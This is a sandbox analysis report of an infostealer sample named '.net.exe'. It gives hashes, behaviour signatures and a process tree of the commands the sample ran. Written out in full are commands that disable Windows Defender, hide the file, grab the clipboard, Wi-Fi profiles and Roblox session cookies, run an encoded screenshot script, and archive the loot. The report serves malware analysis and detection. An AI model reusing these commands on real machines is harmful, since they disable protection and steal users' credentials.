Analysis

  • max time kernel
    94s
  • max time network
    150s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    06-01-2025 15:05

General

  • Target

    .net.exe

  • Size

    20.0MB

  • MD5

    28f25e18733f88820fef41c6d34dfcbb

  • SHA1

    490587f9bc871206e303efcbebb3746bd7561737

  • SHA256

    6f6109c626ace179bf754e5e27c7f2f2168503c1f7ba1d44346e8be9be1e58fa

  • SHA512

    f1df90cf3e9306d87cdf6c0a6d2edfb39996a89789ddf6b7174bffacc2a87fb931e8d91a8641ec9b19a4f545217d8182a106706bfdc00d2d8cc44717f8f40ac2

  • SSDEEP

    196608:dXV1vOxB6ylnlPzf+JiJCsmFMvQn6hqgdhQ:FuBRlnlPSa7mmvQpgdhQ

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 5 IoCs

    Using powershell.exe command.

  • Drops file in Drivers directory 3 IoCs
  • Clipboard Data 1 TTPs 2 IoCs

    Adversaries may collect data stored in the clipboard from users copying information within or between applications.

  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 17 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Looks up external IP address via web service 2 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

  • Enumerates processes with tasklist 1 TTPs 5 IoCs
  • Hide Artifacts: Hidden Files and Directories 1 TTPs 1 IoCs
  • UPX packed file 58 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Event Triggered Execution: Netsh Helper DLL 1 TTPs 3 IoCs

    Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system.

  • System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs

    Adversaries may check for Internet connectivity on compromised systems.

  • System Network Configuration Discovery: Wi-Fi Discovery 1 TTPs 2 IoCs

    Adversaries may search for information about Wi-Fi networks, such as network names and passwords, on compromised systems.

  • Detects videocard installed 1 TTPs 3 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 20 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\.net.exe
    "C:\Users\Admin\AppData\Local\Temp\.net.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:3144
    • C:\Users\Admin\AppData\Local\Temp\.net.exe
      "C:\Users\Admin\AppData\Local\Temp\.net.exe"
      2⤵
      • Drops file in Drivers directory
      • Loads dropped DLL
      • Suspicious use of WriteProcessMemory
      PID:4360
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\.net.exe'"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1892
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\.net.exe'
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4716
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2 & "%ProgramFiles%\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4004
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          powershell Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend
          4⤵
          • Command and Scripting Interpreter: PowerShell
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:3460
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:3208
        • C:\Windows\system32\tasklist.exe
          tasklist /FO LIST
          4⤵
          • Enumerates processes with tasklist
          • Suspicious use of AdjustPrivilegeToken
          PID:2364
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2876
        • C:\Windows\System32\Wbem\WMIC.exe
          wmic csproduct get uuid
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1680
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2"
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4804
        • C:\Windows\system32\reg.exe
          REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\DriverDesc 2
          4⤵
            PID:672
        • C:\Windows\system32\cmd.exe
          C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2"
          3⤵
          • Suspicious use of WriteProcessMemory
          PID:1080
          • C:\Windows\system32\reg.exe
            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000\ProviderName 2
            4⤵
              PID:436
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3468
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              • Suspicious use of AdjustPrivilegeToken
              PID:2292
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3996
            • C:\Windows\System32\Wbem\WMIC.exe
              wmic path win32_VideoController get name
              4⤵
              • Detects videocard installed
              PID:1404
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "attrib +h +s "C:\Users\Admin\AppData\Local\Temp\.net.exe""
            3⤵
            • Hide Artifacts: Hidden Files and Directories
            • Suspicious use of WriteProcessMemory
            PID:3664
            • C:\Windows\system32\attrib.exe
              attrib +h +s "C:\Users\Admin\AppData\Local\Temp\.net.exe"
              4⤵
              • Views/modifies file attributes
              PID:4884
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:956
            • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
              powershell -Command Add-MpPreference -ExclusionPath 'C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\     .scr'
              4⤵
              • Command and Scripting Interpreter: PowerShell
              • Suspicious behavior: EnumeratesProcesses
              PID:4600
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:1820
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:4428
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3520
            • C:\Windows\system32\tasklist.exe
              tasklist /FO LIST
              4⤵
              • Enumerates processes with tasklist
              PID:2992
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /c "WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName"
            3⤵
              PID:3644
              • C:\Windows\System32\Wbem\WMIC.exe
                WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntivirusProduct Get displayName
                4⤵
                  PID:1224
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "powershell Get-Clipboard"
                3⤵
                • Clipboard Data
                PID:4488
                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                  powershell Get-Clipboard
                  4⤵
                  • Clipboard Data
                  • Suspicious behavior: EnumeratesProcesses
                  PID:4744
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                3⤵
                  PID:1072
                  • C:\Windows\system32\tasklist.exe
                    tasklist /FO LIST
                    4⤵
                    • Enumerates processes with tasklist
                    PID:4268
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                  3⤵
                    PID:3316
                    • C:\Windows\system32\tree.com
                      tree /A /F
                      4⤵
                        PID:2692
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "netsh wlan show profile"
                      3⤵
                      • System Network Configuration Discovery: Wi-Fi Discovery
                      PID:3200
                      • C:\Windows\system32\netsh.exe
                        netsh wlan show profile
                        4⤵
                        • Event Triggered Execution: Netsh Helper DLL
                        • System Network Configuration Discovery: Wi-Fi Discovery
                        PID:2440
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /c "systeminfo"
                      3⤵
                        PID:3928
                        • C:\Windows\system32\systeminfo.exe
                          systeminfo
                          4⤵
                          • Gathers system information
                          PID:4052
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /c "REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath"
                        3⤵
                          PID:4956
                          • C:\Windows\system32\reg.exe
                            REG QUERY HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters /V DataBasePath
                            4⤵
                              PID:4772
                          • C:\Windows\system32\cmd.exe
                            C:\Windows\system32\cmd.exe /c "powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
                            3⤵
                              PID:3668
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
                                4⤵
                                • Suspicious behavior: EnumeratesProcesses
                                PID:2448
                                • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                  "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zktxfav3\zktxfav3.cmdline"
                                  5⤵
                                    PID:1168
                                    • C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                      C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA1DD.tmp" "c:\Users\Admin\AppData\Local\Temp\zktxfav3\CSCC3F96F97EBFB4C23A6922D3A8D19A8D7.TMP"
                                      6⤵
                                        PID:4168
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c "tree /A /F"
                                  3⤵
                                    PID:4164
                                    • C:\Windows\system32\tree.com
                                      tree /A /F
                                      4⤵
                                        PID:3776
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
                                      3⤵
                                        PID:3052
                                        • C:\Windows\system32\attrib.exe
                                          attrib -r C:\Windows\System32\drivers\etc\hosts
                                          4⤵
                                          • Drops file in Drivers directory
                                          • Views/modifies file attributes
                                          PID:2872
                                      • C:\Windows\system32\cmd.exe
                                        C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
                                        3⤵
                                          PID:4344
                                          • C:\Windows\system32\attrib.exe
                                            attrib +r C:\Windows\System32\drivers\etc\hosts
                                            4⤵
                                            • Drops file in Drivers directory
                                            • Views/modifies file attributes
                                            PID:4892
                                        • C:\Windows\system32\cmd.exe
                                          C:\Windows\system32\cmd.exe /c "tree /A /F"
                                          3⤵
                                            PID:3700
                                            • C:\Windows\system32\tree.com
                                              tree /A /F
                                              4⤵
                                                PID:3664
                                            • C:\Windows\system32\cmd.exe
                                              C:\Windows\system32\cmd.exe /c "tree /A /F"
                                              3⤵
                                                PID:316
                                                • C:\Windows\system32\tree.com
                                                  tree /A /F
                                                  4⤵
                                                    PID:4128
                                                • C:\Windows\system32\cmd.exe
                                                  C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
                                                  3⤵
                                                    PID:3648
                                                    • C:\Windows\system32\tasklist.exe
                                                      tasklist /FO LIST
                                                      4⤵
                                                      • Enumerates processes with tasklist
                                                      PID:4600
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                    3⤵
                                                      PID:2984
                                                      • C:\Windows\system32\tree.com
                                                        tree /A /F
                                                        4⤵
                                                          PID:3024
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /c "tree /A /F"
                                                        3⤵
                                                          PID:3964
                                                          • C:\Windows\system32\tree.com
                                                            tree /A /F
                                                            4⤵
                                                              PID:2532
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                            3⤵
                                                              PID:2456
                                                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                4⤵
                                                                • Command and Scripting Interpreter: PowerShell
                                                                • Suspicious behavior: EnumeratesProcesses
                                                                PID:2680
                                                            • C:\Windows\system32\cmd.exe
                                                              C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
                                                              3⤵
                                                                PID:1280
                                                                • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                  powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                                                  4⤵
                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                  PID:3460
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /c "getmac"
                                                                3⤵
                                                                  PID:216
                                                                  • C:\Windows\system32\getmac.exe
                                                                    getmac
                                                                    4⤵
                                                                      PID:3728
                                                                  • C:\Windows\system32\cmd.exe
                                                                    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI31442\rar.exe a -r -hp"bebra123" "C:\Users\Admin\AppData\Local\Temp\b8xMD.zip" *"
                                                                    3⤵
                                                                      PID:808
                                                                      • C:\Users\Admin\AppData\Local\Temp\_MEI31442\rar.exe
                                                                        C:\Users\Admin\AppData\Local\Temp\_MEI31442\rar.exe a -r -hp"bebra123" "C:\Users\Admin\AppData\Local\Temp\b8xMD.zip" *
                                                                        4⤵
                                                                        • Executes dropped EXE
                                                                        PID:4364
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /c "wmic os get Caption"
                                                                      3⤵
                                                                        PID:4344
                                                                        • C:\Windows\System32\Wbem\WMIC.exe
                                                                          wmic os get Caption
                                                                          4⤵
                                                                            PID:3124
                                                                        • C:\Windows\system32\cmd.exe
